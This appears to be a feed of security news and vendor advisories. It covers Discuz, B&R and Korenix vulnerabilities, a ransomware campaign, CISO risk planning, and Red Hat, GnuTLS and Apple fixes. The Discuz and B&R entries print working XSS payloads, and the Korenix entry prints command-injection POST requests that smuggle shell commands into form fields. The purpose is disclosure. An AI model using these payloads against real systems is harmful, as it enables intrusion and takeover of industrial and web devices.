Cross site scripting (XSS) vulnerability in DiscuzX 3.4 allows attackers to execute arbitrary code via the datetline, title, tpp, or username parameters via the audit search.

**Description**

Admin backend audit search of content audit component with reflected-XSS in POST value “dateline”, “title”, “tpp” and “username”, which bypassed discuz security check and even could hijack callback url link, and it can also inject javascript to setTimeout at the end of html response.

**Affected Version**

DiscuzX <= 3.4, SC\_UTF8\_20221111

**POC**

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  
15  
16  

POST /cms/discuz/upload/admin.php?action=moderate&operation=threads HTTP/1.1  
Host: 192.168.0.4  
Content-Length: 166  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
Origin: http://192.168.0.4  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_15\_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Referer: http://192.168.0.4/cms/discuz/upload/admin.php?action=moderate&operation=threads  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8  
Cookie: 5Kkn\_2132\_saltkey=y03s5T45; 5Kkn\_2132\_lastvisit=1668496347; 5Kkn\_2132\_ulastactivity=07108qps3b3FkXEEZNxrT%2BtyQpXYN9%2FSOodQCNbMLoO%2BO6DOk8pF; 5Kkn\_2132\_auth=7791L55DZFdkAgcM5rDcnjIiVH0t%2BptlGCIqLkAhUIRMsUDTnq%2BGi7atBCt%2BPdyl2mCVv0hA3jA%2BxaOfDB1h; 5Kkn\_2132\_lastcheckfeed=1%7C1668501456; 5Kkn\_2132\_nofavfid=1; 5Kkn\_2132\_sid=yhpz44; 5Kkn\_2132\_lip=172.17.0.1%2C1668502019; 5Kkn\_2132\_lastact=1668502045%09admin.php%09  
Connection: close  
  
formhash=288a0c1d&scrolltop=&anchor=&username=aa&title=aa&tpp=20&filter=normal&modfid=all&dateline=604"></a><script>alert(1)</script><!--&modsubmit=%E6%8F%90%E4%BA%A4  

**Reference**

*   Gitee Issues (Login Required)
*   CVE

> Reported by Srpopty, vulnerability discovered by using Corax.

CVE-2022-45543: Vulnerability - Discuz X3.4 Backend Reflected XSS (CVE-2022-45543)

By Habiba Rashid
Hackers are deploying the MortalKombat ransomware and Laplas Clipper malware in a financially motivated campaign against victims worldwide.
This is a post from HackRead.com Read the original post: New MortalKombat Ransomware Attack Aiming for Crypto Wallets

The ransomware encrypts all files on the infected system, including those in the trash bin and virtual machine files. It corrupts Windows Explorer, deletes folders and files from the start-up menu, and disables the Run Command.

Cisco’s Talos cybersecurity team has been tracking an unidentified threat actor behind a ransomware campaign that uses a variant of the Xorist commodity ransomware MortalKombat, as well as a GO variant of the **Laplas Clipper malware**.

The detailed advisory by Talos states that, once a computer is infected, it displays a Mortal Kombat 11 wallpaper along with a note instructing the victim to contact the attackers using **qTox**. For your information, qTox is an instant messaging app that is available for download via GitHub.

The email claims that the user’s payment has timed out and carries an attachment, which contains the malicious payload in a zipped file with a name that appears to be a CoinPayments transaction number.

Upon opening the attachment, a **multi-stage attack chain** is initiated, during which the actor delivers either malware or ransomware. The ransomware encrypts all files on the infected system, including those in the trash bin and virtual machine files. It corrupts Windows Explorer, deletes folders and files from the start-up menu, and disables the Run Command.

In case the email attachment drops Laplas Clipper alternatively, the victim’s **cryptocurrency wallet is targeted**. The malware monitors the computer’s clipboard for cryptocurrency wallet addresses.

If one is found, it is sent to the attacker’s server, where a Clipper bot creates a lookalike address owned by the hacker and then replaces the clipboard entry. This, according to Cisco Talos’ **blog post**, allows the threat actors to receive the funds that the user attempts to transfer into their own wallet.

> “The loader script will run the dropped payload as a process in the victim’s machine, then delete the downloaded and dropped malicious files to clean up the infection markers.”
> 
> _Cisco Talos Intelligence Group_

The campaign has reportedly been targeting individuals, small businesses, and large corporations alike in the United States, England, Turkey, and the Philippines.

The best way to protect yourself from being affected by **similar ransomware campaigns** is to be wary of suspicious emails from services you use. Until you ensure that the email you received is from a legitimate entity, it is highly advised that you do not click on any attachments.

Keeping the nature of this ransomware campaign in mind, Cisco Talos also encouraged companies to remain vigilant when performing cryptocurrency transactions.

1.  **Ransomware asks users to play Click Me game**
2.  **Ransomware tells users to play Japanese game**
3.  **New ransomware asks victims to play PUBG game**

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

New MortalKombat Ransomware Attack Aiming for Crypto Wallets

2022 saw a record number of cyberattacks. In response, regulators are prescribing how companies should manage their risks. How do you prepare?

In 2022, we saw a large number of cyberattacks and breaches that affected both companies and countries, driven primarily by accelerating innovation by threat actors and continued diversification of the threat actor economy. While many technical responses have been proposed, the policy responses pose a more challenging issue, as companies will need to comply with public policy decisions despite challenging macroeconomic conditions and a persistent lack of skilled professionals to work on cybersecurity.

In short, 2023 will be the year of risk.

**1\. Anticipate org chart changes and more collaboration with the C-suite.**

Pending regulatory changes require that the CISO be independent, and this independence will likely require organizational chart changes, as CISOs have historically reported to the CIO, CTO, or another senior executive with a background in technology.

This frequently creates an implicit conflict of interest when budgets and staffing considerations arise, as the incentives of the CIO or other senior executives do not necessarily align with the goals of the CISO. In 2023, CISOs should prepare to be adequately independent and have good visibility into the management of cyber-risk. Being independent includes the responsibility of setting staffing and budgets for approval by a committee, rather than providing a cybersecurity budget line item as part of another senior executive's larger budget for the year.

**2\. Be ready to answer more risk-related questions from the board …**

Boards want to have more oversight of cyber-risk. In 2023, organizations should plan on inviting their CISO to a board meeting (and to be somewhat forgiving of that first meeting with those CISOs who come from a technical background). While not all board members need to understand cybersecurity, all CISOs (or CIOs, or whoever presents to the board) need to be able to speak to the board in the language of risk to effectively communicate status, learn about larger initiatives, and ask for assistance or perspective when needed. Although this will be a new requirement for publicly traded companies, privately held companies should strongly consider adopting this new change to reporting.

**3\. … and as a result, be more diligent about communicating risk.**

Companies should track the risk of noncompliance and be able to describe their risk management plans associated with noncompliance. Depending on the specific regulatory body, civil and criminal penalties are potential outcomes, as well as congressional hearings or reputational damages.

Companies that have DFARS requirements — particularly those with CMMC level 2 control requirements — hold the dual risks of noncompliance leading to denial of future Department of Defense contracts as well as the potential of whistleblowers under the False Claims Act. As a result, CISOs will need to be consistent and persistent about communicating the status of their risk and compliance posture.

**4\. CISOs will need to invest in internal assessments as more security breaches hit the news.**

Cybersecurity breaches were a hot topic in 2022, with several high-profile cases making national headlines. For example, the Federal Trade Commission (FTC) sought action against online alcohol marketplace Drizly — and its CEO, Cory Rellas — for cybersecurity failures affecting over 2.5 million consumers. Notably, the FTC specifically named and sanctioned Rellas — a new move for the governing body. This change in posture may indicate a larger shift toward enforcement at the FTC, particularly for organizations that don’t have adequate controls around the protection and disposition of consumer data.

One lesson carries across these stories: the importance of effective internal assessments, as they are critical tools to find weaknesses in your security program and assuring that those weaknesses are fixed. We predict a sharp increase in investigations with adversarial discovery in 2023 as companies watch these major news stories play out in real-time.

**5\. SMBs should consider increasing security control monitoring to avoid cyberattacks.**

Smaller companies are more vulnerable to cyberattacks, but why? Simply put, they don’t have the budget or resources to combat ransomware attacks, which is why they are a high priority for threat actors.

More controls in place means more processes for maintaining those controls, which results in more manual processes that IT security professionals must handle. For example, SMBs will need to map out the GDPR compliance legalese to controls for breach notifications, or quickly finding CIS Control Group 3 to help with data disposal.

IT, security, and risk management professionals will need to better collect and organize their evidence in preparation for applications and renewals of their cyber insurance policies. They might also consider a tool that enables them to link risks to controls to decide how much coverage they actually need.

**About the Author**

    

Kayne McGladrey, CISSP, is the field CISO for Hyperproof and a senior member of the IEEE. He has over two decades of experience in cybersecurity and has served as a CISO and advisory board member, and focuses on the policy, social, and economic effects of cybersecurity lapses to individuals, companies, and the nation.

2023 Is the Year of Risk: 5 Ways to Prepare

B&R Systems Diagnostics Manager versions above or equal to 3.00 and below or equal to C4.93 suffer from a cross site scripting vulnerability.

SEC Consult Vulnerability Lab Security Advisory < 20230214-0 >  
=======================================================================  
               title: Multiple XSS Vulnerabilities  
             product: B&R Systems Diagnostics Manager  
  vulnerable version: >=3.00 and <=C4.93  
       fixed version: >=D4.93  
          CVE number: CVE-2022-4286  
              impact: medium  
            homepage: https://www.br-automation.com  
               found: 2022-10-28  
                  by: S. Robertz (Office Vienna)  
                      G. Hechenberger (Office Vienna)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Atos company  
                      Europe | Asia | North America

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"Our slogan is our mission. The pursuit of Perfection in Automation has  
inspired and guided B&R for over 40 years. To us, perfection means more  
than developing the best solutions in industrial automation. It also means  
developing the best relationships – with our customers and partners as  
well as our employees and suppliers.

Keen foresight and entrepreneurial courage helped us rise quickly into  
the ranks of top global players in industrial automation. An intuitive sense  
of market dynamics and emerging trends has established us as a pioneer,  
leading the way with the most innovative technology on the market.

Our role as the ABB Group's global center for machine and factory automation  
strengthens our position of leadership and adds new momentum to our  
impressive record of sustained growth."

Source: https://www.br-automation.com/en/about-us/

Business recommendation:  
------------------------  
The vendor provides a software update which should be installed immediately.

SEC Consult highly recommends to perform a thorough security review of the  
product conducted by security professionals to identify and resolve potential  
further security issues.

Vulnerability overview/description:  
-----------------------------------  
1) Multiple Reflected Cross-Site-Scripting Vulnerabilities (CVE-2022-4286)  
An attacker can execute arbitrary JavaScript code in the context of the  
victim's session, thus perform all actions, exfiltrate information, etc.  
In order to exploit this vulnerability the attacker will have to trick  
the user into visiting a manipulated URL.

Proof of concept:  
-----------------  
1) Multiple Reflected Cross-Site-Scripting Vulnerabilities (CVE-2022-4286)  
The following URL has to be visited by the victim in order to execute  
arbitrary JavaScript code.

http://<PLC-IP>/sdm/cgiFileLoop.cgi?service=javascript:alert(document.domain);%2f%2f&type=512&scope=%3Cfile:///etc/passwd%3E&module=Snapshot&option=3

A very similar vulnerability can be found at another endpoint of the  
System Diagnostic Manager (SDM).

http://<PLC-IP>/sdm/svg.cgi?type=cpuusage&index=1%3Cscript%3Ealert(document.domain)%3C/script%3E

Vulnerable / tested versions:  
-----------------------------  
The following device and firmware version has been tested:  
* B&R X20CP3687X SwModuleVersion 186

According to the vendor, all B&R Automation Runtime (AR) versions >=3.00 and <=C4.93  
are affected.

Vendor contact timeline:  
------------------------  
2022-11-21: Contacting vendor through cybersecurity@br-automation.com.  
             Sent encrypted advisory.  
2022-11-22: Vendor requests B&R Automation Runtime version.  
2022-12-01: Vendor confirms vulnerability. Will be fixed with next release.  
             Asking for timeline.  
2022-12-13: Advisory and patch will be published on 2023-02-10.  
             Vendor offers to share the advisory for review purposes.  
2023-01-25: Reviewing vendor advisory, receiving CVE + affected/fixed version  
             numbers  
2023-02-10: Vendor provides the patch.  
2023-02-14: Coordinated release of security advisory.

Solution:  
---------  
The vendor supplies a patch, which should be installed immediately.  
The following version mitigates the identified XSS issues:  
* B&R Automation Runtime version >=D4.93

The vendor has published the following security advisory:  
https://www.br-automation.com/downloads_br_productcatalogue/assets/1675607299099-en-original-1.0.pdf

Workaround:  
-----------  
Administrators can deactivate the System Diagnostics Manager in case it is not  
needed.

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult, an Atos company  
Europe | Asia | North America

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Atos company. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult  
EOF S. Robertz, G. Hechenberger / @2023

B&R Systems Diagnostics Manager Cross Site Scripting

Red Hat Security Advisory 2023-0651-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution esigned for on-premise or private cloud deployments.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: OpenShift Container Platform 4.11.27 security update  
Advisory ID:       RHSA-2023:0651-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0651  
Issue date:        2023-02-15  
CVE Names:         CVE-2021-4238 CVE-2022-47629   
=====================================================================

1. Summary:

Red Hat OpenShift Container Platform release 4.11.27 is now available with  
updates to packages and images that fix several bugs and add enhancements.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution esigned for on-premise or private  
cloud deployments.

Security Fix(es):

* goutils: RandomAlphaNumeric and CryptoRandomAlphaNumeric are not as  
random as they should be (CVE-2021-4238)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other elated information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* Networking Day 1 - Bootstrap Doesn't Get External IP when no DHCP Server  
(BZ#2048600)

3. Solution:

For OpenShift Container Platform 4.11 see the following documentation,  
which will be updated shortly for this release, for important instructions  
on how to upgrade your cluster and fully apply this asynchronous errata  
update:

https://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.html

You can download the oc tool and use it to inspect release image metadata  
for x86_64, s390x, ppc64le, and aarch64 architectures. The image digests  
can be found at:

https://quay.io/repository/openshift-release-dev/ocp-release?tab=tags.

The sha values for the release are:

(For x86_64 architecture)  
The image digest is  
sha256:65e71a774a18c1c191f28655ce245abeecd653e8215b75f87eb23ceadacd530d

(For s390x architecture)  
The image digest is  
sha256:cfccfab6abf7cd74cffbc43e4ae38745f258cb28ff6360b0f433c7718d6f144b

(For ppc64le architecture)  
The image digest is sha256:  
e13089586d2061a41250e2b546259bef0c5c4995c704d0e2220ae516a1a675da

(For aarch64 architecture)  
The image digest is  
sha256:932754cfa58f41186a48ecff03c6345c59325fc7ff1496e91e57fa34752db142

All OpenShift Container Platform 4.11 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at:  
https://docs.openshift.com/container-platform/4.11/updating/updating-cluster-cli.html

4. Bugs fixed (https://bugzilla.redhat.com/):

2048600 - Networking Day 1 - Bootstrap Doesn't Get External IP when no DHCP Server  
2156729 - CVE-2021-4238 goutils: RandomAlphaNumeric and CryptoRandomAlphaNumeric are not as random as they should be

5. JIRA issues fixed (https://issues.jboss.org/):

OCPBUGS-3507 - [4.11.z] Incorrect network configuration in worker node with two interfaces  
OCPBUGS-4340 - oc get dc fails when AllRequestBodies audit-profile is set in apiserver  
OCPBUGS-5459 - Topology sidebar actions doesn't show the latest resource data  
OCPBUGS-5926 - NMstate removes egressip in OpenShift cluster with SDN plugin  
OCPBUGS-6176 - Tracker: Configure ignored namespaces into multus-admission-controller (4.11)  
OCPBUGS-6683 - [4.11]Improve Pod Admission failure for restricted-v2 denials that pass with restricted   
OCPBUGS-6837 - Add rpm-build to DTK image  
OCPBUGS-6907 - Image registry Operator does not use Proxy when connecting to openstack  
OCPBUGS-6920 - Tracker: Configure ignored namespaces into multus-admission-controller (4.11,CNO)  
OCPBUGS-7033 - 4.11 error 524 from seccomp(2) when trying to load filter [rhel-8.6.0.z]   
OCPBUGS-7034 - 4.11 [iavf] It takes long time to create multiple VF interfaces and the VF interface names are not consistent [rhel-8.6.0.z]

6. References:

https://access.redhat.com/security/cve/CVE-2021-4238  
https://access.redhat.com/security/cve/CVE-2022-47629  
https://access.redhat.com/security/updates/classification/#important

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY+zQA9zjgjWX9erEAQjY7Q//YWMAWAjecEvTomhKUA2d5zlkZ+5x85ce  
DRlz4l1m8INyBt6/6P7H03ahzq/3v50Zxr+SRL9trJS1V9VS9vD/n+YaIFr65gbG  
FivmQwH4tBNVjmxG4Lhn5Al87xXyJbvUHX3SRoluj1C7k8UHZBw2uhXo1bS7SHq7  
+K6e/+nXR2UroGdkDU/kB6xpMwSKE0pJrVo/xpaD9QgzGjtVXmbL3b0USEUeU3w1  
grQKknqqu7ItZaV3MgcA5DxDlOdl896Btd6/T/2RG20P2Zrf77LM5cAssiwwbDF7  
FzuU6Ve8i1oEAvHZlJjrqJyVMwF9oDjBlEdcjJKTTrpn3VeHVnEjv7l0eHcbGSsU  
kB1CpMC2UA/uQD3QDZhCpWUfybej3zuhY40lxmz5Tf/NKduX6J8uOb+0RdSYsVWr  
7Q5sp6ybngKDTLyzZJwvj/NfVuNqtkhcOXhFDeeoUjsj4ONV0PZakKj2FJfP464J  
JfLnyufhgfy03D4CbLqSeQxV9hPwW4CyQ5h46/zLtqKe06yh8LAf8fDsnkayk2h2  
I4xdIehgw1txDh8RO2d43y5i2DnSjNmacWhxWy38bNdRGxPUF36pnfjuG9T83Gw4  
iLaPQEeIVD/7692QNZO8cGntLtZoM7TkfwPAEEth3QC9JGM+TLtl2YwXQQWtxTNU  
wCGZORPJZyw=  
=sByk  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0651-01

Multiple versions of Korenix JetWave suffer from authenticated command injection and denial of service vulnerabilities.

    CyberDanube Security Research 20230213-0-------------------------------------------------------------------------------                 title| Multiple Vulnerabilities               product| JetWave4221 HP-E, JetWave 2212G, JetWave 2212X/2212S,                      | JetWave 2211C, JetWave 2411/2111, JetWave 2411L/2111L,                      | JetWave 2414/2114, JetWave 2424, JetWave 2460,                      | JetWave 3220/3420 V3    vulnerable version| See "Vulnerable Versions"         fixed version| See "Solution"            CVE number| requested                impact| High              homepage| https://korenix.com/                 found| 2022-11-28                    by| S. Dietz, T. Weber (Office Vienna)                      | CyberDanube Security Research                      | Vienna | St. Pölten                      |                      | https://www.cyberdanube.com-------------------------------------------------------------------------------Vendor description-------------------------------------------------------------------------------"Korenix Technology, a Beijer group company within the Industrial Communicationbusiness area, is a global leading manufacturer providing innovative, market-oriented, value-focused Industrial Wired and Wireless Networking Solutions.[...]Our products are mainly applied in SMART industries: Surveillance, Machine-to-Machine, Automation, Remote Monitoring, andTransportation. Worldwidecustomer base covers different Sales channels, including end-customers, OEMs,system integrators, and brand label partners."Source:https://www.korenix.com/en/about/index.aspx?kind=3Vulnerable Versions:-------------------------------------------------------------------------------The following firmware versions have been found to be vulnerable byCyberDanube:  * Korenix JetWave4221 HP-E <= V1.3.0  * Korenix JetWave 3220/3420 V3 < V1.7The following firmware versions have been identified to be vulnerable by thevendor:  * Korenix JetWave 2212G V1.3.T  * Korenix JetWave 2212X/2112S V1.3.0  * Korenix JetWave 2211C < V1.6  * Korenix JetWave 2411/2111 < V1.5  * Korenix JetWave 2411L/2111L < V1.6  * Korenix JetWave 2414/2114 < V1.4  * Korenix JetWave 2424 < V1.3  * Korenix JetWave 2460 < V1.6Vulnerability overview-------------------------------------------------------------------------------1) Authenticated Command InjectionThe web server of the device is prone to an authenticated command injection.It allows an attacker to gain full access to the underlying operating system ofthe device with all implications. If such a device is acting as key device inan industrial network, or controls various critical equipment via serial ports,more extensive damage in the corresponding network can be done by an attacker.2) Authenticated Denial of Web-ServiceWhen logged in, a user can issue a POST request such that the underlying binaryexits. The Web-Service becomes unavailable and cannot be accessed until thedevice gets rebooted.Proof of Concept-------------------------------------------------------------------------------1) Authenticated Command Injection1.a)The command "touch /tmp/poc" was injected to the system by using the followingPOST request:===============================================================================POST /goform/formTFTPLoadSave HTTP/1.1Host: 172.16.0.38User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 127Origin: http://172.16.0.38Connection: closeReferer: http://172.16.0.38/mgmtsaveconf.aspCookie: -common-web-session-=::webs.session::d7af70f81033cff3828902e476ceda45Upgrade-Insecure-Requests: 1submit-url=%2Fmgmtsaveconf.asp&ip_address=192.168.1.1&file_name=%24%28touch+%2Ftmp%2Fpoc%29&tftp_action=load&tftp_config=Submit=============================================================================== The command gets executed as root and a file under the folder /tmp/ is created.1.b)The command "touch /tmp/poc2" was injected to the system by using the followingPOST request:===============================================================================POST /goform/formSysCmd HTTP/1.1Host: 172.16.0.38Content-Type: application/x-www-form-urlencodedConnection: closeReferer: 172.16.0.38Cookie: -common-web-session-=::webs.session::df1307d508d798638a8b4572987462bbContent-Length: 40sysCmd=touch%20/tmp/poc2&submit-url================================================================================The command gets executed as root and a file under the folder /tmp/ is created.Command output is written into /tmp/syscmd.2) Authenticated Denial of Web-ServiceThe process goahead chrashes when the following POST request is sent to theendpoint /goform/formDefault:===============================================================================POST /goform/formDefault HTTP/1.1Host: 172.16.0.38User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 62Origin: http://172.16.0.38Connection: closeReferer: http://172.16.0.38/toolping.aspCookie: -common-web-session-=::webs.session::3c624961199904f380e978a3967cc356Upgrade-Insecure-Requests: 1PingIPAddress=127.0.0.1&submit-url=%2Ftoolping.asp&Submit=Ping=============================================================================== The output was observed on the terminal using our emulated instance:=============================================================================== rm: invalid option -- /BusyBox v1.01 (2022.10.21-00:22+0000) multi-call binaryUsage: rm [OPTION]... FILE...Remove (unlink) the FILE(s).  You may use '--' toindicate that all following arguments are non-options.Options:     -i        always prompt before removing each destination     -f        remove existing destinations, never prompt     -r or -R    remove the contents of directories recursivelykillall: wlwatchdog: no process killedkillall: wlapwatchdog: no process killed=============================================================================== The vulnerabilities were manually verified on an emulated device by using theMEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).Solution-------------------------------------------------------------------------------Owner of these products are suggested to update to the following versions:  * Korenix JetWave 4221 HP-E V1.4.0  * Korenix JetWave 2212G V1.10  * Korenix JetWave 2212X/2112S V1.11  * Korenix JetWave 2211C V1.6  * Korenix JetWave 2411/2111 V1.5  * Korenix JetWave 2411L/2111L V1.6  * Korenix JetWave 2414/2114 V1.4  * Korenix JetWave 2424 V1.3  * Korenix JetWave 2460 V1.6  * Korenix JetWave 3220/3420 V3 V1.7Recommendation-------------------------------------------------------------------------------CyberDanube recommends customers from Korenix to upgrade the firmware to thelatest version available. Furthermore, a full security review by professionalsis recommended.Contact Timeline-------------------------------------------------------------------------------2022-12-05: Contacting Beijer Electronics Group via cs@beijerelectronics.com2022-12-12: Meeting with Beijer Electronics. Vulnerabilities were confirmed by             the vendor. The vendor planned to fix the vulnerabilities in the             next 1.5 months.2023-01-04: Contact shared the updated firmware version. CyberDanube checked             if the vulnerabilities got fixed. The contact communicated that             not only JetWave4221 is vulnerable to these issues. Therefore,             CyberDanube postponed the release of the Advisory until the other             products have been patched.2023-01-30: Meeting with Beijer Electronics. Customer get informed about the             issues. Fixes got published. Disclosure date got shifted to             2023-02-13 to provide a time-window for patching.2023-02-13: Coordinated release of security advisory.Web: https://www.cyberdanube.comTwitter: https://twitter.com/cyberdanubeMail: research at cyberdanube dot comEOF S. Dietz, T. Weber / @2023

Korenix JetWave Command Injection / Denial Of Service

A timing side-channel in the handling of RSA ClientKeyExchange messages was discovered in GnuTLS. This side-channel can be sufficient to recover the key encrypted in the RSA ciphertext across a network in a Bleichenbacher style attack. To achieve a successful decryption the attacker would need to send a large amount of specially crafted messages to the vulnerable server. By recovering the secret from the ClientKeyExchange message, the attacker would be able to decrypt the application data exchanged over that connection.

Skip to content

**Timing sidechannel in RSA decryption**

**Description of problem:**

The time for GnuTLS to respond to malformed RSA ciphertexts in ClientKeyExchange depends on kind of error in the RSA padding.

Generally, it looks like the response time depends on size of encrypted data in the PKCS#1 v1.5 encrypted data.

I've run tests with 1 million connections per probe, on a 2.4GHz skylake CPU with 1024 bit RSA key, the two probes with most dissimilar results were "too long (49-byte) pre master secret" and "invalid MAC in Finished on pos 0", it takes the server an extra 58.5ns to respond one over the other. This is with a 95% confidence interval of +-6.8ns.

Exact results of Wilcoxon signed-rank tests are in this report.csv file.

**Version of gnutls used:**

gnutls-3.6.8-11.el8\_2.x86\_64

**Distributor of gnutls (e.g., Ubuntu, Fedora, RHEL)**

RHEL 8

**How reproducible:**

Time the server responses to differently malformed ClientKeyExchange data.

**Actual results:**

Timing of server responses depends on the way RSA ciphertext is malformed

**Expected results:**

The timing of server responses should be completely independent of the RSA ciphertexts.

**Additional info:**

We're aware of other implementations that have the timing sidechannel, we'd like to coordinate the release of this information to the public.

Edited Feb 10, 2023 by Hubert Kario (@mention me if you need reply)

CVE-2023-0361: Timing sidechannel in RSA decryption (#1050) · Issues · gnutls / GnuTLS · GitLab

Apple Security Advisory 2023-02-13-3 - Safari 16.3.1 addresses a code execution vulnerability.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-2023-02-13-3 Safari 16.3.1Safari 16.3.1 addresses the following issues.Information about the security content is also available athttps://support.apple.com/HT213638.WebKitAvailable for: macOS Big Sur and macOS MontereyImpact: Processing maliciously crafted web content may lead toarbitrary code execution. Apple is aware of a report that this issuemay have been actively exploited.Description: A type confusion issue was addressed with improvedchecks.WebKit Bugzilla: 251944CVE-2023-23529: an anonymous researcherAll information is also posted on the Apple Security Updatesweb site: https://support.apple.com/en-us/HT201222.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmPq5PMACgkQ4RjMIDkeNxmFTBAA05jcHEZOdXuE0BQKft0qoWItZ2Dg0p/ONxiqS9ihNDqBt+6q+yOORvr4Vr2iVpCpo4F5nQv/qBApGCS84SVN9rRIM1VteOYIObgpo37CceODrbywjSTHcD6GbR47ra8reQK10sDSIoQtX1XKGUltUC/RfKnVDtk/coNu7TJj/VVg2YNPOlQFc5ETie0d/NOcK+8Ds1NvK4HQ0Gfq+KHmE507T7nAMfcK4YVlZCtkz4YHEa9w9AcIgmQ4nzlOSEs5mHu2egr70Xy8+CL7i82Oh2FBzVetLkDhhrZppjykX7zK4Lc0cbABpiaIu/6ObPGhoW4sFfPCJa8NSflRLKe+aNHdyuzjuqx8rSeqFdP4+rhdI/X2Z/9VKsB/1Tch55nuBhEGZTejmdwtorGf1+otfW5XpWOGXwnE9sR0qjVvwPwfuK5noLUoLvBRfiK6xaKUG6IXEYCt0rVncJJ9QtJJKYvqhbf3OwNodrA/V9AAm2MTtIo514BkfZHtv01xOm7tv35a+5QFcoW/iJBvdTxGVCwzb+2AshMCqO9MQxt8cWknC41K0l6Fl6Yl/P0qzUJr4NoG72LwW0PqaHimWDVAqJcAHsESe/1qnLO3rZItQJByxURc4wUpHAojsFBEBtLiS7FNHOvw4bM1ylQIXXoiFD7sE9NpvksUDzNoRdyAEOM==b0uc-----END PGP SIGNATURE-----

Apple Security Advisory 2023-02-13-3

Apple Security Advisory 2023-02-13-2 - macOS Ventura 13.2.1 addresses code execution and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2023-02-13-2 macOS Ventura 13.2.1

macOS Ventura 13.2.1 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213633.

Kernel  
Available for: macOS Ventura  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2023-23514: Xinru Chi of Pangu Lab, Ned Williamson of Google  
Project Zero

Shortcuts  
Available for: macOS Ventura  
Impact: An app may be able to observe unprotected user data  
Description: A privacy issue was addressed with improved handling of  
temporary files.  
CVE-2023-23522: Wenchao Li and Xiaolong Bai of Alibaba Group

WebKit  
Available for: macOS Ventura  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution. Apple is aware of a report that this issue  
may have been actively exploited.  
Description: A type confusion issue was addressed with improved  
checks.  
WebKit Bugzilla: 251944  
CVE-2023-23529: an anonymous researcher

macOS Ventura 13.2.1 may be obtained from the Mac App Store or  
Apple's Software Downloads web site:  
https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
